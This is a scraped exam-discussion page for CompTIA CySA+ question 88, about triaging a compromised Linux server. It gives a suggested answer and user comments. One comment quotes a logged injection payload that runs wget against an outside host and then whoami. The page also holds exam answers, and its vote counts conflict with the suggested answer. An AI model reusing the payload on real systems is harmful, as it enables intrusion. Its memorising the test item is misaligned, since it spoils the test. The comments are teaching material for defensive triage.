ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam CS0-003 All Questions

View all questions & answers for the CS0-003 exam
Go to Exam

Exam CS0-003 topic 1 question 88 discussion

Actual exam question from CompTIA's CS0-003
Question #: 88
Topic #: 1
[All CS0-003 Questions]

An incident response team member is triaging a Linux server. The output is shown below:



Which of the following is the adversary most likely trying to do?

  • A. Create a backdoor root account named zsh.
  • B. Execute commands through an unsecured service account.
  • C. Send a beacon to a command-and-control server.
  • D. Perform a denial-of-service attack on the web server.
Show Suggested Answer Hide Answer
Suggested Answer: B 🗳️
by kmordalv at Sept. 14, 2023, 8:30 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
kmordalv
Highly Voted 1 year, 9 months ago
Selected Answer: B
Looking at the output I see that it is running container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) Of the options proposed, it seems that option B is the most logical answer.
upvoted 20 times
...
Wole_excel
Highly Voted 10 months, 2 weeks ago
ased on the provided output: /etc/passwd: The http account has a /bin/bash shell assigned instead of the usual /usr/bin/nologin or /bin/false. This suggests that the adversary has potentially modified the http service account to allow for command execution, which typically wouldn't be possible with a service account. /var/log/httpd: The logs indicate an error related to parsing a request and references a suspicious URL (http://grohl.ve.da/tmp/brkgtr.zip). This suggests that the adversary attempted to exploit a vulnerability in the web application (likely a file upload or remote code execution vulnerability) to download and potentially execute a malicious file. Given this information: The adversary is most likely trying to execute commands through an unsecured service account (B). The modification of the http account to use /bin/bash indicates an attempt to gain shell access using that account, which could be leveraged for further exploitation. The log entries also suggest an attempt to download and possibly execute malicious files through the compromised web server.
upvoted 8 times
...
thisguyfucks
Most Recent 9 months, 2 weeks ago
Selected Answer: B
Im thinking B
upvoted 1 times
...
a3432e2
11 months, 1 week ago
Selected Answer: B
It is B, There is no indication in the provided logs or user account information that a backdoor root account named zsh is being created. The /etc/passwd file does not show a user with such a name or hint towards such an action. This option seems less likely based on the information given. Normally, service accounts like http (associated with the HTTP service) should have minimal permissions and use restrictive shells like /usr/bin/nologin. The presence of a shell like /bin/bash may allow an attacker to execute commands if they manage to exploit the service.
upvoted 5 times
...
LB54
11 months, 2 weeks ago
Selected Answer: A
Based on the provided image, the adversary is most likely trying to create a backdoor root account named zsh (Option A). This conclusion is drawn from the presence of a user account named ‘zsh’ with root privileges in the /etc/passwd file, which is a common tactic used by attackers to maintain persistent access to a compromised system.
upvoted 1 times
Koekjesdoos_111
8 months ago
Thats a file... not the username
upvoted 1 times
...
...
thisguyfucks
1 year, 3 months ago
Selected Answer: B
I'm thinking B here.
upvoted 2 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel